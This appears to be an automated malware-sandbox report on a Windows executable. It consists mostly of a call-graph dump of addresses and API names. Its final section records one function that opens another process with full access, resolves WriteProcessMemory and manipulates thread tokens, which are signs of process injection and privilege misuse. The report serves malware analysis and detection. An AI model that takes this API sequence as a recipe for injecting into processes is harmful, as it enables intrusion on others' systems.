7793->7795 7794->6814 7794->6815 7796 4025ea ??3@YAXPAX ??3@YAXPAX 7795->7796 7796->7794 7797->6821 7798->6827 7799->6827 7801 411d82 RegQueryValueExA 7800->7801 7802 40275e 7801->7802 7803 40282d RegCloseKey 7802->7803 7804 40276a strtoul 7802->7804 7803->6827 7804->7804 7805 402794 7804->7805 7806 4027ee _mbscpy _mbscpy 7805->7806 7806->7803 7807->6827 7808->6838 7868 406d91 memset 7809->7868 7811 412d78 ??2@YAPAXI 7812 412d87 7811->7812 7813 412d90 ??2@YAPAXI 7812->7813 7814 412da2 7813->7814 7815 412dab ??2@YAPAXI 7814->7815 7816 412dc2 ??2@YAPAXI 7815->7816 7818 412de6 ??2@YAPAXI 7816->7818 7820 40ebd8 7818->7820 7821 412f02 7820->7821 7869 4067ba CreateFileA 7821->7869 7823 412f0f 7824 412f44 7823->7824 7825 412f17 GetFileSize 7823->7825 7824->6842 7870 412ed6 7825->7870 7827 412f28 7828 406ed6 ReadFile 7827->7828 7829 412f34 CloseHandle 7828->7829 7829->7824 7873 4075ad MultiByteToWideChar 7830->7873 7832 412fa1 7835 407491 ??3@YAXPAX 7832->7835 7834 412ed6 2 API calls 7836 412f85 memcpy 7834->7836 7837 40ec08 7835->7837 7836->7832 7839 40d1a5 7837->7839 7840 413095 7839->7840 7888 40733e ??3@YAXPAX ??3@YAXPAX 7840->7888 7842 4130c7 7889 40733e ??3@YAXPAX ??3@YAXPAX 7842->7889 7844 4133aa 7844->6843 7845 40746b 4 API calls 7847 4130d2 7845->7847 7846 412fb0 19 API calls 7846->7847 7847->7844 7847->7845 7847->7846 7848 41322b memcpy 7847->7848 7890 412768 7847->7890 7848->7847 7851 412e65 7850->7851 7852 412e5a ??3@YAXPAX 7850->7852 7853 407491 ??3@YAXPAX 7851->7853 7855 412e7c 7851->7855 7852->7851 7856 412e75 ??3@YAXPAX 7853->7856 7854 412e92 7858 412ea8 7854->7858 7860 407491 ??3@YAXPAX 7854->7860 7855->7854 7857 407491 ??3@YAXPAX 7855->7857 7856->7855 7859 412e8b ??3@YAXPAX 7857->7859 7861 412ebe 7858->7861 7899 40733e ??3@YAXPAX ??3@YAXPAX 7858->7899 7859->7854 7863 412ea1 ??3@YAXPAX 7860->7863 7862 412ed4 7861->7862 7900 40733e ??3@YAXPAX ??3@YAXPAX 7861->7900 7862->6832 7863->7858 7866 412eb7 ??3@YAXPAX 7866->7861 7867 412ecd ??3@YAXPAX 7867->7862 7868->7811 7869->7823 7871 412ee0 ??3@YAXPAX 7870->7871 7872 412eeb ??2@YAPAXI 7870->7872 7871->7872 7872->7827 7874 407634 7873->7874 7875 4075d7 7873->7875 7874->7832 7874->7834 7876 40746b 4 API calls 7875->7876 7877 4075f5 MultiByteToWideChar 7876->7877 7879 407614 7877->7879 7880 40762a 7877->7880 7883 407564 WideCharToMultiByte 7879->7883 7881 407491 ??3@YAXPAX 7880->7881 7881->7874 7884 4075a4 7883->7884 7885 407586 7883->7885 7884->7880 7886 40746b 4 API calls 7885->7886 7887 407590 WideCharToMultiByte 7886->7887 7887->7884 7888->7842 7889->7847 7891 412d44 7890->7891 7894 412b5d 7890->7894 7891->7847 7892 412b83 strlen _strncoll 7892->7894 7893 412cc0 strlen _strncoll 7893->7894 7894->7891 7894->7892 7894->7893 7895 412c93 memcpy 7894->7895 7897 412c0b memcpy atoi WideCharToMultiByte 7894->7897 7898 406d5a strtoul 7895->7898 7897->7894 7898->7894 7899->7866 7900->7867 7901->6855 7902->6875 7913 40f94e 7903->7913 7906 40f946 7906->6875 7907 40f8c8 memcmp 7907->7906 7908 40f8df 7907->7908 7908->7906 7909 40f94e 3 API calls 7908->7909 7912 40f8f5 7909->7912 7910 40f94e 3 API calls 7910->7912 7912->7906 7912->7910 7918 40f689 7912->7918 7914 40f960 SetFilePointer 7913->7914 7915 40f96e memset 7913->7915 7914->7915 7916 406ed6 ReadFile 7915->7916 7917 40f8c4 7916->7917 7917->7906 7917->7907 7919 40f696 7918->7919 7920 40f806 7919->7920 7921 40f94e 3 API calls 7919->7921 7920->7912 7922 40f6ca 7921->7922 7922->7920 7923 40f94e 3 API calls 7922->7923 7924 40f6e7 7923->7924 7925 40f94e 3 API calls 7924->7925 7929 40f779 7924->7929 7927 40f710 _strcmpi 7925->7927 7928 40f734 _strcmpi 7927->7928 7927->7929 7928->7929 7930 40f74b _strcmpi 7928->7930 7929->7920 7931 40f789 _strcmpi 7929->7931 7948 40f5c1 7929->7948 7930->7929 7932 40f762 _strcmpi 7930->7932 7933 40f80b 7931->7933 7934 40f79d _strcmpi 7931->7934 7932->7929 7935 40f5c1 2 API calls 7933->7935 7934->7933 7936 40f7b1 _strcmpi 7934->7936 7937 40f822 7935->7937 7936->7933 7938 40f7c5 _strcmpi 7936->7938 7937->7920 7939 40f826 _mbscpy 7937->7939 7938->7933 7940 40f7d9 _strcmpi 7938->7940 7941 40f84e 7939->7941 7940->7929 7940->7933 7941->7920 7942 40f5c1 2 API calls 7941->7942 7943 40f83a _strcmpi 7941->7943 7942->7941 7943->7941 7944 40f869 7943->7944 7945 40f5c1 2 API calls 7944->7945 7946 40f87f 7945->7946 7946->7920 7947 40f883 _mbscpy 7946->7947 7947->7920 7949 40f649 7948->7949 7950 40f5d8 7948->7950 7949->7929 7950->7949 7951 40f61e memcpy 7950->7951 7951->7949 7952 40f65a 7951->7952 7952->7949 7953 40f666 _ultoa 7952->7953 7953->7949 7965 411d68 RegOpenKeyExA 7954->7965 7956 413772 7957 40da13 7956->7957 7958 411d82 RegQueryValueExA 7956->7958 7957->6882 7957->6885 7959 41378b 7958->7959 7960 4137bc RegCloseKey 7959->7960 7961 411d82 RegQueryValueExA 7959->7961 7960->7957 7962 4137a6 7961->7962 7962->7960 7966 413a5a 7962->7966 7965->7956 7978 413646 strlen 7966->7978 7968 413a73 7969 413a92 7968->7969 7980 4137ce 7968->7980 7973 4137ba 7969->7973 8009 413b1d memset memset memset 7969->8009 7972 413aab 7972->7973 7974 413acb memset 7972->7974 7973->7960 7975 4137ce 21 API calls 7974->7975 7976 413afc 7975->7976 7976->7973 7977 413b05 _mbscpy 7976->7977 7977->7973 7979 413665 7978->7979 7979->7968 7981 414060 7980->7981 7982 4137db memset 7981->7982 7983 413646 strlen 7982->7983 7984 413809 strlen 7983->7984 7985 413a51 7984->7985 7986 413822 7984->7986 7985->7969 7986->7985 7987 41382a memset memset memset memset 7986->7987 7988 4138a4 7987->7988 7989 40c929 3 API calls 7988->7989 7990 4138b2 7989->7990 7991 40c9c7 5 API calls 7990->7991 7992 4138c1 memcpy 7991->7992 7993 4138dd 7992->7993 7994 40c929 3 API calls 7993->7994 7995 4138ee 7994->7995 7996 40c9c7 5 API calls 7995->7996 7997 4138fa memcpy memcpy 7996->7997 7998 413928 7997->7998 7999 40c929 3 API calls 7998->7999 8000 413939 7999->8000 8001 40c9c7 5 API calls 8000->8001 8002 413945 8001->8002 8003 4139e2 _mbscpy 8002->8003 8004 413a00 8003->8004 8005 40c929 3 API calls 8004->8005 8006 413a0e 8005->8006 8007 40c9c7 5 API calls 8006->8007 8008 413a1a memcpy memcpy 8007->8008 8008->7985 8010 413646 strlen 8009->8010 8011 413b81 strlen 8010->8011 8012 413b99 8011->8012 8023 413c28 8011->8023 8013 413ba1 memcpy memcpy 8012->8013 8012->8023 8014 413bcf 8013->8014 8015 40c929 3 API calls 8014->8015 8016 413be1 8015->8016 8017 40c9c7 5 API calls 8016->8017 8018 413bf0 memcpy 8017->8018 8019 413c0e 8018->8019 8020 40c929 3 API calls 8019->8020 8021 413c1f 8020->8021 8022 40c9c7 5 API calls 8021->8022 8022->8023 8023->7972 8024->6888 8025->6894 8026->6894 8028 407b01 8027->8028 8029 407bbf RegCloseKey 8027->8029 8030 404c9d 3 API calls 8028->8030 8029->6894 8032 407b12 8030->8032 8031 407baa 8033 404ce0 FreeLibrary 8031->8033 8032->8031 8034 407b3e WideCharToMultiByte LocalFree 8032->8034 8033->8029 8035 411d82 RegQueryValueExA 8034->8035 8036 407b87 8035->8036 8037 411d82 RegQueryValueExA 8036->8037 8038 407b9c 8037->8038 8039 406958 2 API calls 8038->8039 8039->8031 8040->6894 8041->6900 8042->6911 8043->6911 8045 410eb7 8044->8045 8045->6911 8046->6911 8047 41208b FindResourceA 8048 4120a4 SizeofResource 8047->8048 8051 4120ce 8047->8051 8049 4120b5 LoadResource 8048->8049 8048->8051 8050 4120c3 LockResource 8049->8050 8049->8051 8050->8051 5994 412111 EnumResourceNamesA 6004 413e10 6023 414000 6004->6023 6006 413e1c GetModuleHandleA 6007 413e2e __set_app_type __p__fmode __p__commode 6006->6007 6009 413ec0 6007->6009 6010 413ed4 6009->6010 6011 413ec8 __setusermatherr 6009->6011 6024 413fe8 _controlfp 6010->6024 6011->6010 6013 413ed9 _initterm __getmainargs _initterm 6014 413f30 GetStartupInfoA 6013->6014 6016 413f64 GetModuleHandleA 6014->6016 6025 40c66a 6016->6025 6020 413f95 _cexit 6022 413fca 6020->6022 6021 413f8e exit 6021->6020 6023->6006 6024->6013 6078 404d7a LoadLibraryA 6025->6078 6027 40c682 6035 40c686 6027->6035 6086 412192 6027->6086 6032 40c6a4 FreeLibrary 6033 40c6ad EnumResourceTypesA 6032->6033 6034 40c6d8 MessageBoxA 6033->6034 6036 40c6f0 6033->6036 6034->6035 6035->6020 6035->6021 6107 40c427 ??2@YAPAXI 6036->6107 6043 40c73a 6141 409167 memset 6043->6141 6044 40c74e 6146 40902b memset 6044->6146 6049 40c8b3 ??3@YAXPAX 6052 40c8d7 6049->6052 6053 40c8cb DeleteObject 6049->6053 6050 4077af 2 API calls 6051 40c762 6050->6051 6055 40c766 RegDeleteKeyA 6051->6055 6056 40c77b 6051->6056 6167 40733e ??3@YAXPAX ??3@YAXPAX 6052->6167 6053->6052 6055->6049 6056->6049 6059 40c7d5 CoInitialize 6056->6059 6151 40c5a4 6056->6151 6057 40c8e9 6168 407a7a 6057->6168 6166 40c3af RegisterClassA CreateWindowExA 6059->6166 6063 40c7e7 ShowWindow UpdateWindow LoadAcceleratorsA PostMessageA GetMessageA 6071 40c848 6063->6071 6072 40c8ad 6063->6072 6067 40c7d3 6067->6059 6068 40c7a4 ??3@YAXPAX 6068->6052 6070 40c7c1 DeleteObject 6068->6070 6070->6052 6073 40c84e TranslateAccelerator 6071->6073 6075 40c871 IsDialogMessage 6071->6075 6076 40c87c IsDialogMessage 6071->6076 6072->6049 6073->6071 6074 40c8a0 GetMessageA 6073->6074 6074->6072 6074->6073 6075->6074 6075->6076 6076->6074 6077 40c88c TranslateMessage DispatchMessageA 6076->6077 6077->6074 6079 404da5 GetProcAddress 6078->6079 6080 404dcd 6078->6080 6081 404db5 6079->6081 6082 404dbe FreeLibrary 6079->6082 6084 404df4 6080->6084 6085 404ddd MessageBoxA 6080->6085 6081->6082 6082->6080 6083 404dc9 6082->6083 6083->6080 6084->6027 6085->6027 6087 40c692 6086->6087 6088 41219b LoadLibraryA 6086->6088 6090 410de1 GetCurrentProcess 6087->6090 6088->6087 6089 4121af GetProcAddress 6088->6089 6089->6087 6172 410daa 6090->6172 6093 410e02 GetLastError 6095 40c69f 6093->6095 6094 410e0a 6178 410d8a 6094->6178 6095->6032 6095->6033 6097 410e11 6098 410e36 6097->6098 6099 410e1d GetProcAddress 6097->6099 6101 410d8a LoadLibraryA 6098->6101 6099->6098 6100 410e2a LookupPrivilegeValueA 6099->6100 6100->6098 6102 410e4f 6101->6102 6103 410e53 GetProcAddress 6102->6103 6104 410e6d CloseHandle 6102->6104 6103->6104 6105 410e60 AdjustTokenPrivileges 6103->6105 6104->6095 6105->6104 6109 40c453 6107->6109 6108 40c461 ??2@YAPAXI 6110 40c478 6108->6110 6112 40c47d 6108->6112 6109->6108 6189 4092cc 6110->6189 6113 40c4b2 DeleteObject 6112->6113 6114 40c4bf 6112->6114 6113->6114 6181 406ae0 6114->6181 6116 40c4c4 6184 401000 6116->6184 6120 40c508 6121 40763d 6120->6121 6201 40733e ??3@YAXPAX ??3@YAXPAX 6121->6201 6125 40746b malloc memcpy ??3@YAXPAX ??3@YAXPAX 6127 407678 6125->6127 6126 407758 6135 407783 6126->6135 6226 40746b 6126->6226 6127->6125 6127->6126 6129 4076fc ??3@YAXPAX 6127->6129 6133 407705 6127->6133 6127->6135 6205 407364 6127->6205 6129->6127 6133->6127 6218 406982 6133->6218 6134 407364 7 API calls 6134->6135 6202 407491 6135->6202 6136 4077af 6137 4077f5 6136->6137 6138 4077b7 6136->6138 6137->6043 6137->6044 6138->6137 6139 4077de _strnicmp 6138->6139 6140 4077c7 _strcmpi 6138->6140 6139->6138 6140->6138 6232 409141 6141->6232 6143 409196 6237 409068 6143->6237 6147 409141 3 API calls 6146->6147 6148 40905a 6147->6148 6261 408fbc 6148->6261 6267 403cb2 6151->6267 6155 40c5f1 6159 40c665 6155->6159 6270 40bbf0 memset GetModuleFileNameA strrchr 6155->6270 6156 40c5f6 6313 40c50e _strcmpi 6156->6313 6159->6067 6159->6068 6162 40c610 6292 40a8f2 6162->6292 6166->6063 6167->6057 6169 407a80 ??3@YAXPAX 6168->6169 6170 407a87 6168->6170 6169->6170 6171 40733e ??3@YAXPAX ??3@YAXPAX 6170->6171 6171->6035 6173 410d8a LoadLibraryA 6172->6173 6174 410db5 6173->6174 6175 410db9 GetProcAddress 6174->6175 6176 410dda 6174->6176 6175->6176 6177 410dca 6175->6177 6176->6093 6176->6094 6177->6176 6179 410da6 6178->6179 6180 410d8f LoadLibraryA 6178->6180 6179->6097 6180->6097 6199 406a19 memset _mbscpy 6181->6199 6183 406af7 CreateFontIndirectA 6183->6116 6185 40102c 6184->6185 6186 401030 LoadIconA 6185->6186 6187 40100d strncat 6185->6187 6188 402c8f _mbscpy 6186->6188 6187->6185 6188->6120 6200 406d91 memset 6189->6200 6191 4092df ??2@YAPAXI 6192 4092f3 ??2@YAPAXI 6191->6192 6194 409314 ??2@YAPAXI 6192->6194 6196 409335 ??2@YAPAXI 6194->6196 6198 409356 6196->6198 6198->6112 6199->6183 6200->6191 6201->6127 6203 4074a1 6202->6203 6204 407497 ??3@YAXPAX 6202->6204 6203->6136 6204->6203 6206 407372 strlen 6205->6206 6207 40737e 6205->6207 6206->6207 6208 407396 ??3@YAXPAX 6207->6208 6209 40739f 6207->6209 6210 4073aa 6208->6210 6211 406982 3 API calls 6209->6211 6213 4073c2 6210->6213 6214 4073b9 ??3@YAXPAX 6210->6214 6212 4073a9 6211->6212 6212->6210 6216 406982 3 API calls 6213->6216 6215 4073ce memcpy 6214->6215 6215->6127 6217 4073cd 6216->6217 6217->6215 6219 406989 malloc 6218->6219 6220 4069cf 6218->6220 6222 4069c5 6219->6222 6223 4069aa 6219->6223 6220->6133 6222->6133 6224 4069be ??3@YAXPAX 6223->6224 6225 4069ae memcpy 6223->6225 6224->6222 6225->6224 6227 407482 6226->6227 6228 407476 ??3@YAXPAX 6226->6228 6230 406982 3 API calls 6227->6230 6229 40748e 6228->6229 6229->6134 6231 40748d 6230->6231 6231->6229 6250 4069e8 GetModuleFileNameA 6232->6250 6234 409147 strrchr 6235 409156 6234->6235 6236 409159 _mbscat 6234->6236 6235->6236 6236->6143 6251 414060 6237->6251 6242 408ca1 3 API calls 6243 4090b0 6242->6243 6244 408ca1 3 API calls 6243->6244 6245 4090bb EnumResourceNamesA EnumResourceNamesA _mbscpy memset 6244->6245 6246 409107 LoadStringA 6245->6246 6247 40911d 6246->6247 6247->6246 6249 409135 6247->6249 6258 408d0f _itoa 6247->6258 6249->6049 6250->6234 6252 409075 _mbscpy _mbscpy 6251->6252 6253 408ca1 6252->6253 6254 414060 6253->6254 6255 408cae memset GetPrivateProfileStringA 6254->6255 6256 408d09 6255->6256 6257 408cf9 WritePrivateProfileStringA 6255->6257 6256->6242 6257->6256 6259 408ca1 3 API calls 6258->6259 6260 408d41 6259->6260 6260->6247 6266 4069d3 GetFileAttributesA 6261->6266 6263 408fc5 6264 40902a 6263->6264 6265 408fca _mbscpy _mbscpy GetPrivateProfileIntA GetPrivateProfileStringA 6263->6265 6264->6050 6265->6264 6266->6263 6331 40955a 6267->6331 6271 40bc40 6270->6271 6272 40bc43 _mbscat _mbscpy _mbscpy 6270->6272 6271->6272 6370 4039a8 6272->6370 6275 40bcd4 6277 40bcf9 6275->6277 6385 402d81 6275->6385 6276 40bcc4 GetWindowPlacement 6276->6275 6378 40946f 6277->6378 6281 40b2f5 6282 40b370 6281->6282 6287 40b325 6281->6287 6542 40671b LoadCursorA SetCursor 6282->6542 6284 40b32c _mbsicmp 6284->6287 6285 40b375 6286 4077af 2 API calls 6285->6286 6290 40b39b 6286->6290 6287->6282 6287->6284 6543 40ae7d 6287->6543 6288 40b3e5 SetCursor 6288->6162 6290->6288 6291 40b3dc qsort 6290->6291 6291->6288 6293 40a906 6292->6293 6294 40972b 3 API calls 6292->6294 6295 40a917 GetStdHandle 6293->6295 6296 40a90e 6293->6296 6294->6293 6297 40a914 6295->6297 6560 4067d3 CreateFileA 6296->6560 6299 40aa25 6297->6299 6300 40a92d 6297->6300 6302 406830 9 API calls 6299->6302 6561 40671b LoadCursorA SetCursor 6300->6561 6303 40aa2e 6302->6303 6326 40bdcf 6303->6326 6304 40a93a 6305 40a97f 6304->6305 6311 40a999 6304->6311 6562 409f97 6304->6562 6305->6311 6568 409e6e 6305->6568 6308 40a9ce 6309 40aa17 SetCursor 6308->6309 6310 40aa0e CloseHandle 6308->6310 6309->6303 6310->6309 6311->6308 6578 406830 6311->6578 6314 40c523 _strcmpi 6313->6314 6315 40c51f 6313->6315 6316 40c534 6314->6316 6317 40c538 _strcmpi 6314->6317 6315->6155 6316->6155 6318 40c549 6317->6318 6319 40c54d _strcmpi 6317->6319 6318->6155 6320 40c562 _strcmpi 6319->6320 6321 40c55e 6319->6321 6322 40c573 6320->6322 6323 40c577 _strcmpi 6320->6323 6321->6155 6322->6155 6324 40c588 6323->6324 6325 40c58c _mbsicmp 6323->6325 6324->6155 6325->6155 6327 40bdf6 6326->6327 6328 40bdda 6326->6328 6327->6159 6594 4093d6 6328->6594 6330 40bdef ??3@YAXPAX 6330->6327 6343 409370 6331->6343 6334 4095be memcpy memcpy 6335 409618 6334->6335 6335->6334 6336 409656 ??2@YAPAXI ??2@YAPAXI 6335->6336 6338 40876f 12 API calls 6335->6338 6337 409692 ??2@YAPAXI 6336->6337 6340 4096c9 6336->6340 6337->6340 6338->6335 6340->6340 6353 4094da 6340->6353 6342 403cc1 _strcmpi 6342->6155 6342->6156 6344 409382 6343->6344 6345 40937b ??3@YAXPAX 6343->6345 6346 409390 6344->6346 6347 409389 ??3@YAXPAX 6344->6347 6345->6344 6348 4093a1 6346->6348 6349 40939a ??3@YAXPAX 6346->6349 6347->6346 6350 4093c1 ??2@YAPAXI ??2@YAPAXI 6348->6350 6351 4093b1 ??3@YAXPAX 6348->6351 6352 4093ba ??3@YAXPAX 6348->6352 6349->6348 6350->6334 6351->6352 6352->6350 6354 407491 ??3@YAXPAX 6353->6354 6355 4094e3 6354->6355 6356 407491 ??3@YAXPAX 6355->6356 6357 4094eb 6356->6357 6358 407491 ??3@YAXPAX 6357->6358 6359 4094f3 6358->6359 6360 407491 ??3@YAXPAX 6359->6360 6361 4094fb 6360->6361 6362 40746b 4 API calls 6361->6362 6363 40950e 6362->6363 6364 40746b 4 API calls 6363->6364 6365 409518 6364->6365 6366 40746b 4 API calls 6365->6366 6367 409522 6366->6367 6368 40746b 4 API calls 6367->6368 6369 40952c 6368->6369 6369->6342 6371 4039c8 6370->6371 6392 40d725 6371->6392 6373 403a14 memset sprintf 6375 403a49 6373->6375 6374 403a60 _strcmpi 6374->6375 6375->6373 6375->6374 6376 403ab1 6375->6376 6407 411ec1 6375->6407 6376->6275 6376->6276 6379 40947e 6378->6379 6381 40948c 6378->6381 6533 40923a 6379->6533 6382 4094d7 6381->6382 6383 4094c9 6381->6383 6382->6281 6538 4091aa 6383->6538 6386 402d90 6385->6386 6387 402e0a 6385->6387 6386->6387 6388 402dc4 GetSystemMetrics 6386->6388 6387->6277 6388->6387 6389 402dd8 GetSystemMetrics 6388->6389 6389->6387 6390 402de6 6389->6390 6390->6387 6391 402def SetWindowPos 6390->6391 6391->6387 6411 40d3a0 memset 6392->6411 6406 40d772 6406->6373 6408 411ee3 GetPrivateProfileStringA 6407->6408 6409 411ed4 WritePrivateProfileStringA 6407->6409 6410 411ef6 6408->6410 6409->6410 6410->6375 6412 411dae 3 API calls 6411->6412 6413 40d3e8 6412->6413 6414 40d422 6413->6414 6493 407139 strlen strlen 6413->6493 6416 40d46b memset 6414->6416 6498 41212c 6414->6498 6477 41223f 6416->6477 6423 40d4ce 6492 4069d3 GetFileAttributesA 6423->6492 6424 40d4bb 6514 406b4b _mbscpy 6424->6514 6426 40d412 6426->6414 6430 40d417 _mbscpy 6426->6430 6430->6414 6432 40d450 6513 4069d3 GetFileAttributesA 6432->6513 6433 40d4db 6437 40d4e9 memset 6433->6437 6435 40d458 6435->6416 6436 40d45e _mbscpy 6435->6436 6436->6416 6438 41223f 9 API calls 6437->6438 6439 40d529 strlen strlen 6438->6439 6440 40d55f 6439->6440 6441 40d54c 6439->6441 6528 4069d3 GetFileAttributesA 6440->6528 6442 406b4b 4 API calls 6441->6442 6442->6440 6444 40d56c 6445 40d607 memset 6444->6445 6446 41223f 9 API calls 6445->6446 6447 40d647 strlen strlen 6446->6447 6448 40d66a 6447->6448 6450 40d67d 6447->6450 6449 406b4b 4 API calls 6448->6449 6449->6450 6529 4069d3 GetFileAttributesA 6450->6529 6452 40d68a 6453 40d578 memset 6452->6453 6454 41223f 9 API calls 6453->6454 6455 40d5b8 strlen strlen 6454->6455 6456 40d5ee 6455->6456 6457 40d5db 6455->6457 6530 4069d3 GetFileAttributesA 6456->6530 6458 406b4b 4 API calls 6457->6458 6458->6456 6460 40d5fb 6461 40d696 memset 6460->6461 6462 41223f 9 API calls 6461->6462 6463 40d6d6 strlen strlen 6462->6463 6464 40d70c 6463->6464 6465 40d6f9 6463->6465 6531 4069d3 GetFileAttributesA 6464->6531 6466 406b4b 4 API calls 6465->6466 6466->6464 6468 40d719 6469 411dae 6468->6469 6532 411d68 RegOpenKeyExA 6469->6532 6471 40d76c 6476 4069d3 GetFileAttributesA 6471->6476 6472 411dc4 6472->6471 6473 411d82 RegQueryValueExA 6472->6473 6474 411dd9 RegCloseKey 6473->6474 6474->6471 6476->6406 6478 412192 2 API calls 6477->6478 6479 412251 6478->6479 6480 412284 memset 6479->6480 6517 406b06 6479->6517 6482 4122a4 6480->6482 6520 411d68 RegOpenKeyExA 6482->6520 6485 4122d1 6486 412304 _mbscpy 6485->6486 6521 4121c1 6485->6521 6488 40d48f strlen strlen 6486->6488 6488->6423 6488->6424 6489 4122e2 6525 411d82 RegQueryValueExA 6489->6525 6492->6433 6495 407165 6493->6495 6496 407186 6493->6496 6494 407169 _memicmp 6494->6495 6494->6496 6495->6494 6495->6496 6496->6414 6497 4069d3 GetFileAttributesA 6496->6497 6497->6426 6527 411d68 RegOpenKeyExA 6498->6527 6500 412149 6501 41216d 6500->6501 6502 411d82 RegQueryValueExA 6500->6502 6503 412172 GetWindowsDirectoryA _mbscat 6501->6503 6504 40d439 6501->6504 6505 412162 RegCloseKey 6502->6505 6503->6504 6506 40680e strlen 6504->6506 6505->6501 6507 406819 6506->6507 6508 40682d 6506->6508 6507->6508 6509 406820 _mbscat 6507->6509 6510 406958 strlen 6508->6510 6509->6508 6511 406969 6510->6511 6512 40696c memcpy 6510->6512 6511->6512 6512->6432 6513->6435 6515 40680e 2 API calls 6514->6515 6516 406b5d _mbscat 6515->6516 6516->6423 6518 406b15 GetVersionExA 6517->6518 6519 406b26 6517->6519 6518->6519 6519->6480 6519->6488 6520->6485 6522 4121c6 6521->6522 6523 412233 _mbscpy 6522->6523 6524 412216 6522->6524 6523->6489 6524->6489 6526 411da5 RegCloseKey 6525->6526 6526->6486 6527->6500 6528->6444 6529->6452 6530->6460 6531->6468 6532->6472 6534 4092a0 6533->6534 6535 409248 memset 6533->6535 6534->6381 6535->6534 6536 40925f 6535->6536 6536->6534 6537 409260 SendMessageA 6536->6537 6537->6536 6539 409234 6538->6539 6540 4091b8 6538->6540 6539->6382 6540->6539 6541 4091fd SendMessageA 6540->6541 6541->6540 6542->6285 6553 40972b ??2@YAPAXI 6543->6553 6545 40ae8b 6546 40aee2 6545->6546 6547 40aea2 strlen 6545->6547 6549 40aef6 _mbsicmp _mbsicmp 6546->6549 6552 40af50 6546->6552 6547->6546 6548 40aeae atoi 6547->6548 6550 40aebf 6548->6550 6549->6546 6550->6287 6551 407139 strlen strlen _memicmp 6551->6552 6552->6550 6552->6551 6554 4097d5 ??3@YAXPAX 6553->6554 6557 409762 6553->6557 6554->6545 6557->6554 6558 40501f SendMessageA 6557->6558 6559 40504d 6558->6559 6559->6557 6560->6297 6561->6304 6563 409fe3 6562->6563 6567 409f9f 6562->6567 6583 4067ec strlen WriteFile 6563->6583 6565 409ff1 6565->6305 6566 4067ec strlen WriteFile 6566->6567 6567->6563 6567->6566 6569 409f82 6568->6569 6576 409e83 6568->6576 6584 4067ec strlen WriteFile 6569->6584 6571 409f90 6571->6311 6572 409ead strchr 6573 409ebb strchr 6572->6573 6572->6576 6573->6576 6574 4074fa 7 API calls 6574->6576 6575 4067ec strlen WriteFile 6575->6576 6576->6569 6576->6572 6576->6574 6576->6575 6577 407491 ??3@YAXPAX 6576->6577 6577->6576 6579 406840 GetLastError 6578->6579 6580 406848 6578->6580 6579->6580 6585 406735 6580->6585 6583->6565 6584->6571 6586 406752 LoadLibraryExA 6585->6586 6587 406769 FormatMessageA 6585->6587 6586->6587 6588 406764 6586->6588 6589 406782 strlen 6587->6589 6590 4067a7 _mbscpy 6587->6590 6588->6587 6591 40679c LocalFree 6589->6591 6592 40678f _mbscpy 6589->6592 6593 4067b6 sprintf MessageBoxA 6590->6593 6591->6593 6592->6591 6593->6308 6595 409370 5 API calls 6594->6595 6596 4093e4 6595->6596 6597 4093f7 6596->6597 6599 407491 ??3@YAXPAX 6596->6599 6598 40940a 6597->6598 6601 407491 ??3@YAXPAX 6597->6601 6602 40941d 6598->6602 6604 407491 ??3@YAXPAX 6598->6604 6600 4093f0 ??3@YAXPAX 6599->6600 6600->6597 6603 409403 ??3@YAXPAX 6601->6603 6605 409430 ??3@YAXPAX 6602->6605 6607 407491 ??3@YAXPAX 6602->6607 6603->6598 6606 409416 ??3@YAXPAX 6604->6606 6605->6330 6606->6602 6608 409429 ??3@YAXPAX 6607->6608 6608->6605 8052 411e9a 8055 411c8f 8052->8055 8056 411c9c 8055->8056 8057 411ce6 memset GetPrivateProfileStringA 8056->8057 8058 411cab memset 8056->8058 8063 406fa6 strlen 8057->8063 8068 406f2d 8058->8068 8062 411d2f 8064 406fba 8063->8064 8066 406fbc 8063->8066 8064->8062 8065 407003 8065->8062 8066->8065 8072 406d5a strtoul 8066->8072 8070 406f96 WritePrivateProfileStringA 8068->8070 8071 406f3e 8068->8071 8069 406f45 sprintf memcpy 8069->8070 8069->8071 8070->8062 8071->8069 8071->8070 8072->8066 8286 41051f _wcsnicmp 8287 41059a 8286->8287 8288 41054a 8286->8288 8291 40fd01 memset memset 8288->8291 8290 410553 WideCharToMultiByte WideCharToMultiByte 8290->8287 8291->8290

        Executed Functions

        Function 004049E6 Relevance: 58.0, APIs: 28, Strings: 5, Instructions: 233librarymemoryloaderCOMMON
        Download Yara Rule

        Control-flow Graph

        APIs
          • Part of subcall function 004043E4: memset.MSVCRT ref: 00404406
          • Part of subcall function 004043E4: GetSystemDirectoryA.KERNEL32(0041E568,00000104), ref: 0040442B
          • Part of subcall function 004043E4: _mbscpy.MSVCRT ref: 0040443E
          • Part of subcall function 004043E4: memcpy.MSVCRT ref: 004044BD
        • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,00000000,00000000), ref: 00404A0B
        • memset.MSVCRT ref: 00404A2F
        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00404A3F
          • Part of subcall function 00411BA1: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00000000,?,?,?,?,?,?,00404A50,?), ref: 00411BC1
          • Part of subcall function 00411BA1: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00411BD3
          • Part of subcall function 00411BA1: GetModuleHandleA.KERNEL32(ntdll.dll,?,?,?,?,?,?,00404A50,?), ref: 00411BE9
          • Part of subcall function 00411BA1: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00411BF1
          • Part of subcall function 00411BA1: strlen.MSVCRT ref: 00411C15
          • Part of subcall function 00411BA1: strlen.MSVCRT ref: 00411C22
        • GetProcAddress.KERNEL32(00000000,GetModuleHandleA), ref: 00404A66
        • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00404A87
        • GetProcAddress.KERNEL32(00000000,WriteProcessMemory), ref: 00404AA8
        • GetProcAddress.KERNEL32(00000000,LocalFree), ref: 00404AC9
          • Part of subcall function 00411FC6: GetVersionExA.KERNEL32(?,00000000,000000A0), ref: 00411FE0
          • Part of subcall function 004044DE: GetProcAddress.KERNEL32(00000000,DuplicateToken), ref: 0040451C
          • Part of subcall function 004044DE: GetProcAddress.KERNEL32(00000000,SetThreadToken), ref: 00404543
          • Part of subcall function 004044DE: CloseHandle.KERNEL32(?), ref: 00404553
          • Part of subcall function 004044DE: CloseHandle.KERNEL32(?,00000000,000000A0,000000FF,0000000E,?,?,0040428D), ref: 0040455D
          • Part of subcall function 004044DE: FreeLibrary.KERNEL32(00000000,000000FF,0000000E,?,?,0040428D), ref: 0040456E
